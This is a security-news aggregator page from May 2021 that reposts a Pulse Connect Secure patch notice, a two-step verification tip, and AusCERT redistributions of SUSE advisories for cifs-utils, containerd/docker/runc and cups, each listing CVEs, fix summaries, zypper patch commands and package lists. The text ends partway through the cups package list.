Malware Devil

Monday, May 3, 2021

Pulse Connect Secure Patch Availability – SA44784

Today, the Pulse Secure team released a security update to address the issue outlined in Security Advisory SA44784 (CVE-2021-22893) impacting the Pulse Connect Secure appliance. We recommend that customers move quickly to apply the update to ensure they are protected.

The post Pulse Connect Secure Patch Availability – SA44784 appeared first on Pulse Secure Blog.


Two-Step Verification

Two-step verification (also called two-factor authentication or 2FA) is one of the best steps you can take to secure any account. Two-step verification is when you require both a password and a code sent to or generated by your mobile device. At a minimum, enable two-step verification for your most important accounts, such as email, financial and retirement accounts.

ESB-2021.1490 – [SUSE] cifs-utils: Multiple vulnerabilities


===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1490
Security update for cifs-utils
3 May 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: cifs-utils
Publisher: SUSE
Operating System: SUSE
Impact/Access: Execute Arbitrary Code/Commands — Existing Account
Increased Privileges — Existing Account
Access Confidential Data — Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2021-20208 CVE-2020-14342

Reference: ESB-2021.1238

Original Bulletin:
https://www.suse.com/support/update/announcement/2021/suse-su-20211455-1

--------------------------BEGIN INCLUDED TEXT--------------------

SUSE Security Update: Security update for cifs-utils

______________________________________________________________________________

Announcement ID: SUSE-SU-2021:1455-1
Rating: important
References: #1152930 #1174477 #1183239 #1184815
Cross-References: CVE-2020-14342 CVE-2021-20208
Affected Products:
SUSE Linux Enterprise Server for SAP 15
SUSE Linux Enterprise Server 15-LTSS
SUSE Linux Enterprise High Performance Computing 15-LTSS
SUSE Linux Enterprise High Performance Computing 15-ESPOS
______________________________________________________________________________

An update that solves two vulnerabilities and has two fixes is now available.

Description:

This update for cifs-utils fixes the following security issues:

o CVE-2021-20208: Fixed a potential kerberos auth leak escaping from
container. (bsc#1183239)
o CVE-2020-14342: Fixed a shell command injection vulnerability in
mount.cifs. (bsc#1174477)

This update for cifs-utils fixes the following issues:

o Solve invalid directory mounting. When attempting to change the current
working directory into non-existing directories, mount.cifs crashes.
(bsc#1152930)

o Fixed a bug where it was no longer possible to mount CIFS filesystem after
the last maintenance update. (bsc#1184815)

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or “zypper patch”.
Alternatively you can run the command listed for your product:

o SUSE Linux Enterprise Server for SAP 15:
zypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2021-1455=1
o SUSE Linux Enterprise Server 15-LTSS:
zypper in -t patch SUSE-SLE-Product-SLES-15-2021-1455=1
o SUSE Linux Enterprise High Performance Computing 15-LTSS:
zypper in -t patch SUSE-SLE-Product-HPC-15-2021-1455=1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS:
zypper in -t patch SUSE-SLE-Product-HPC-15-2021-1455=1

Package List:

o SUSE Linux Enterprise Server for SAP 15 (ppc64le x86_64):
cifs-utils-6.9-3.14.1
cifs-utils-debuginfo-6.9-3.14.1
cifs-utils-debugsource-6.9-3.14.1
cifs-utils-devel-6.9-3.14.1
o SUSE Linux Enterprise Server 15-LTSS (aarch64 s390x):
cifs-utils-6.9-3.14.1
cifs-utils-debuginfo-6.9-3.14.1
cifs-utils-debugsource-6.9-3.14.1
cifs-utils-devel-6.9-3.14.1
o SUSE Linux Enterprise High Performance Computing 15-LTSS (aarch64 x86_64):
cifs-utils-6.9-3.14.1
cifs-utils-debuginfo-6.9-3.14.1
cifs-utils-debugsource-6.9-3.14.1
cifs-utils-devel-6.9-3.14.1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS (aarch64 x86_64):
cifs-utils-6.9-3.14.1
cifs-utils-debuginfo-6.9-3.14.1
cifs-utils-debugsource-6.9-3.14.1
cifs-utils-devel-6.9-3.14.1

References:

o https://www.suse.com/security/cve/CVE-2020-14342.html
o https://www.suse.com/security/cve/CVE-2021-20208.html
o https://bugzilla.suse.com/1152930
o https://bugzilla.suse.com/1174477
o https://bugzilla.suse.com/1183239
o https://bugzilla.suse.com/1184815

--------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================

ESB-2021.1491 – [SUSE] containerd, docker and runc: Multiple vulnerabilities


===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1491
Security update for containerd, docker and runc
3 May 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: containerd
docker
runc
Publisher: SUSE
Operating System: SUSE
Impact/Access: Execute Arbitrary Code/Commands — Remote/Unauthenticated
Root Compromise — Existing Account
Denial of Service — Remote/Unauthenticated
Access Confidential Data — Remote/Unauthenticated
Unauthorised Access — Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2021-21334 CVE-2021-21285 CVE-2021-21284
CVE-2019-19921 CVE-2019-16884 CVE-2019-5736
CVE-2018-16875 CVE-2018-16874 CVE-2018-16873

Reference: ESB-2021.0891
ESB-2021.0734
ESB-2020.2186
ESB-2020.1505
ESB-2020.1231

Original Bulletin:
https://www.suse.com/support/update/announcement/2021/suse-su-20211458-1

--------------------------BEGIN INCLUDED TEXT--------------------

SUSE Security Update: Security update for containerd, docker, runc

______________________________________________________________________________

Announcement ID: SUSE-SU-2021:1458-1
Rating: important
References: #1028638 #1034053 #1048046 #1051429 #1053532 #1095817
#1118897 #1118898 #1118899 #1121967 #1131314 #1131553
#1149954 #1152308 #1160452 #1168481 #1175081 #1175821
#1181594 #1181641 #1181677 #1181730 #1181732 #1181749
#1182451 #1182476 #1182947 #1183024 #1183397 #1183855
#1184768 #1184962
Cross-References: CVE-2018-16873 CVE-2018-16874 CVE-2018-16875 CVE-2019-16884
CVE-2019-19921 CVE-2019-5736 CVE-2021-21284 CVE-2021-21285
CVE-2021-21334
Affected Products:
SUSE Linux Enterprise Module for Containers 12
______________________________________________________________________________

An update that solves 9 vulnerabilities and has 23 fixes is now available.

Description:

This update for containerd, docker, runc fixes the following issues:

o Docker was updated to 20.10.6-ce
  * Switch version to use -ce suffix rather than _ce to avoid confusing
    other tools (bsc#1182476).
  * CVE-2021-21284: Fixed a potential privilege escalation when the root
    user in the remapped namespace has access to the host filesystem
    (bsc#1181732)
  * CVE-2021-21285: Fixed an issue where pulling a malformed Docker image
    manifest crashes the dockerd daemon (bsc#1181730).

o runc was updated to v1.0.0~rc93 (bsc#1182451 and bsc#1184962).
  * Use the upstream runc package (bsc#1181641, bsc#1181677, bsc#1175821).
  * Fixed /dev/null is not available (bsc#1168481).
  * Fixed an issue where podman hangs when spawned by salt-minion process
    (bsc#1149954).
  * CVE-2019-19921: Fixed a race condition with shared mounts (bsc#1160452).
  * CVE-2019-16884: Fixed an LSM bypass via malicious Docker image that
    mount over a /proc directory (bsc#1152308).
  * CVE-2019-5736: Fixed potential write attacks to the host runc binary
    (bsc#1121967).
  * Fixed an issue where after a kernel-update docker doesn’t run
    (bsc#1131314 bsc#1131553)
  * Ensure that we always include the version information in runc
    (bsc#1053532).

o Switch to Go 1.13 for build.
  * CVE-2018-16873: Fixed a potential remote code execution (bsc#1118897).
  * CVE-2018-16874: Fixed a directory traversal in “go get” via curly
    braces in import paths (bsc#1118898).
  * CVE-2018-16875: Fixed a CPU denial of service (bsc#1118899).
  * Fixed an issue with building containers (bsc#1095817).

o containerd was updated to v1.4.4
  * CVE-2021-21334: Fixed a potential information leak through environment
    variables (bsc#1183397).
  * Handle a requirement from docker (bsc#1181594).
  * Install the containerd-shim* binaries and stop creating (bsc#1183024).
  * update version to the one required by docker (bsc#1034053)

o Use -buildmode=pie for tests and binary build (bsc#1048046, bsc#1051429)
o Cleanup seccomp builds similar (bsc#1028638).
o Update to handle the docker-runc removal, and drop the -kubic flavour
  (bsc#1181677, bsc#1181749)

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or “zypper patch”.
Alternatively you can run the command listed for your product:

o SUSE Linux Enterprise Module for Containers 12:
zypper in -t patch SUSE-SLE-Module-Containers-12-2021-1458=1

Package List:

o SUSE Linux Enterprise Module for Containers 12 (ppc64le s390x x86_64):
containerd-1.4.4-16.38.1
docker-20.10.6_ce-98.66.1
docker-debuginfo-20.10.6_ce-98.66.1
runc-1.0.0~rc93-16.8.1
runc-debuginfo-1.0.0~rc93-16.8.1

References:

o https://www.suse.com/security/cve/CVE-2018-16873.html
o https://www.suse.com/security/cve/CVE-2018-16874.html
o https://www.suse.com/security/cve/CVE-2018-16875.html
o https://www.suse.com/security/cve/CVE-2019-16884.html
o https://www.suse.com/security/cve/CVE-2019-19921.html
o https://www.suse.com/security/cve/CVE-2019-5736.html
o https://www.suse.com/security/cve/CVE-2021-21284.html
o https://www.suse.com/security/cve/CVE-2021-21285.html
o https://www.suse.com/security/cve/CVE-2021-21334.html
o https://bugzilla.suse.com/1028638
o https://bugzilla.suse.com/1034053
o https://bugzilla.suse.com/1048046
o https://bugzilla.suse.com/1051429
o https://bugzilla.suse.com/1053532
o https://bugzilla.suse.com/1095817
o https://bugzilla.suse.com/1118897
o https://bugzilla.suse.com/1118898
o https://bugzilla.suse.com/1118899
o https://bugzilla.suse.com/1121967
o https://bugzilla.suse.com/1131314
o https://bugzilla.suse.com/1131553
o https://bugzilla.suse.com/1149954
o https://bugzilla.suse.com/1152308
o https://bugzilla.suse.com/1160452
o https://bugzilla.suse.com/1168481
o https://bugzilla.suse.com/1175081
o https://bugzilla.suse.com/1175821
o https://bugzilla.suse.com/1181594
o https://bugzilla.suse.com/1181641
o https://bugzilla.suse.com/1181677
o https://bugzilla.suse.com/1181730
o https://bugzilla.suse.com/1181732
o https://bugzilla.suse.com/1181749
o https://bugzilla.suse.com/1182451
o https://bugzilla.suse.com/1182476
o https://bugzilla.suse.com/1182947
o https://bugzilla.suse.com/1183024
o https://bugzilla.suse.com/1183397
o https://bugzilla.suse.com/1183855
o https://bugzilla.suse.com/1184768
o https://bugzilla.suse.com/1184962

--------------------------END INCLUDED TEXT--------------------


ESB-2021.1492 – [Win][UNIX/Linux][SUSE] cups: Root compromise – Existing account


===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1492
Security update for cups
3 May 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: cups
Publisher: SUSE
Operating System: SUSE
UNIX variants (UNIX, Linux, OSX)
Windows
Impact/Access: Root Compromise — Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2021-25317

Original Bulletin:
https://www.suse.com/support/update/announcement/2021/suse-su-20211454-1
https://www.suse.com/support/update/announcement/2021/suse-su-202114712-1
https://www.suse.com/support/update/announcement/2021/suse-su-20211453-1

Comment: This advisory references vulnerabilities in products which run on
platforms other than SUSE. It is recommended that administrators
running cups check for an updated version of the software for their
operating system.

This bulletin contains three (3) SUSE security advisories.

--------------------------BEGIN INCLUDED TEXT--------------------

SUSE Security Update: Security update for cups

______________________________________________________________________________

Announcement ID: SUSE-SU-2021:1454-1
Rating: important
References: #1184161
Cross-References: CVE-2021-25317
Affected Products:
SUSE Manager Server 4.0
SUSE Manager Retail Branch Server 4.0
SUSE Manager Proxy 4.0
SUSE Linux Enterprise Server for SAP 15-SP1
SUSE Linux Enterprise Server for SAP 15
SUSE Linux Enterprise Server 15-SP1-LTSS
SUSE Linux Enterprise Server 15-SP1-BCL
SUSE Linux Enterprise Server 15-LTSS
SUSE Linux Enterprise Module for Development Tools 15-SP3
SUSE Linux Enterprise Module for Development Tools 15-SP2
SUSE Linux Enterprise Module for Basesystem 15-SP3
SUSE Linux Enterprise Module for Basesystem 15-SP2
SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS
SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS
SUSE Linux Enterprise High Performance Computing 15-LTSS
SUSE Linux Enterprise High Performance Computing 15-ESPOS
SUSE Enterprise Storage 6
SUSE CaaS Platform 4.0
______________________________________________________________________________

An update that fixes one vulnerability is now available.

Description:

This update for cups fixes the following issues:

o CVE-2021-25317: ownership of /var/log/cups could allow privilege escalation
from lp user to root via symlink attacks (bsc#1184161)

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or “zypper patch”.
Alternatively you can run the command listed for your product:

o SUSE Manager Server 4.0:
zypper in -t patch SUSE-SLE-Product-SUSE-Manager-Server-4.0-2021-1454=1
o SUSE Manager Retail Branch Server 4.0:
zypper in -t patch SUSE-SLE-Product-SUSE-Manager-Retail-Branch-Server-4.0-2021-1454=1
o SUSE Manager Proxy 4.0:
zypper in -t patch SUSE-SLE-Product-SUSE-Manager-Proxy-4.0-2021-1454=1
o SUSE Linux Enterprise Server for SAP 15-SP1:
zypper in -t patch SUSE-SLE-Product-SLES_SAP-15-SP1-2021-1454=1
o SUSE Linux Enterprise Server for SAP 15:
zypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2021-1454=1
o SUSE Linux Enterprise Server 15-SP1-LTSS:
zypper in -t patch SUSE-SLE-Product-SLES-15-SP1-LTSS-2021-1454=1
o SUSE Linux Enterprise Server 15-SP1-BCL:
zypper in -t patch SUSE-SLE-Product-SLES-15-SP1-BCL-2021-1454=1
o SUSE Linux Enterprise Server 15-LTSS:
zypper in -t patch SUSE-SLE-Product-SLES-15-2021-1454=1
o SUSE Linux Enterprise Module for Development Tools 15-SP3:
zypper in -t patch SUSE-SLE-Module-Development-Tools-15-SP3-2021-1454=1
o SUSE Linux Enterprise Module for Development Tools 15-SP2:
zypper in -t patch SUSE-SLE-Module-Development-Tools-15-SP2-2021-1454=1
o SUSE Linux Enterprise Module for Basesystem 15-SP3:
zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP3-2021-1454=1
o SUSE Linux Enterprise Module for Basesystem 15-SP2:
zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP2-2021-1454=1
o SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS:
zypper in -t patch SUSE-SLE-Product-HPC-15-SP1-LTSS-2021-1454=1
o SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS:
zypper in -t patch SUSE-SLE-Product-HPC-15-SP1-ESPOS-2021-1454=1
o SUSE Linux Enterprise High Performance Computing 15-LTSS:
zypper in -t patch SUSE-SLE-Product-HPC-15-2021-1454=1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS:
zypper in -t patch SUSE-SLE-Product-HPC-15-2021-1454=1
o SUSE Enterprise Storage 6:
zypper in -t patch SUSE-Storage-6-2021-1454=1
o SUSE CaaS Platform 4.0:
To install this update, use the SUSE CaaS Platform ‘skuba’ tool. It will
inform you if it detects new updates and let you then trigger updating of
the complete cluster in a controlled way.

Package List:

o SUSE Manager Server 4.0 (ppc64le s390x x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Manager Server 4.0 (x86_64):
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
o SUSE Manager Retail Branch Server 4.0 (x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Manager Proxy 4.0 (x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Server for SAP 15-SP1 (ppc64le x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Server for SAP 15-SP1 (x86_64):
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Server for SAP 15 (ppc64le x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Server for SAP 15 (x86_64):
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Server 15-SP1-LTSS (aarch64 ppc64le s390x x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Server 15-SP1-LTSS (x86_64):
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Server 15-SP1-BCL (x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Server 15-LTSS (aarch64 s390x):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Module for Development Tools 15-SP3 (aarch64 ppc64le
s390x x86_64):
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
o SUSE Linux Enterprise Module for Development Tools 15-SP2 (aarch64 ppc64le
s390x x86_64):
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
o SUSE Linux Enterprise Module for Basesystem 15-SP3 (aarch64 ppc64le s390x
x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Module for Basesystem 15-SP3 (x86_64):
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Module for Basesystem 15-SP2 (aarch64 ppc64le s390x
x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise Module for Basesystem 15-SP2 (x86_64):
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS (aarch64
x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS (x86_64):
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS (aarch64
x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS (x86_64):
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise High Performance Computing 15-LTSS (aarch64 x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise High Performance Computing 15-LTSS (x86_64):
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS (aarch64 x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
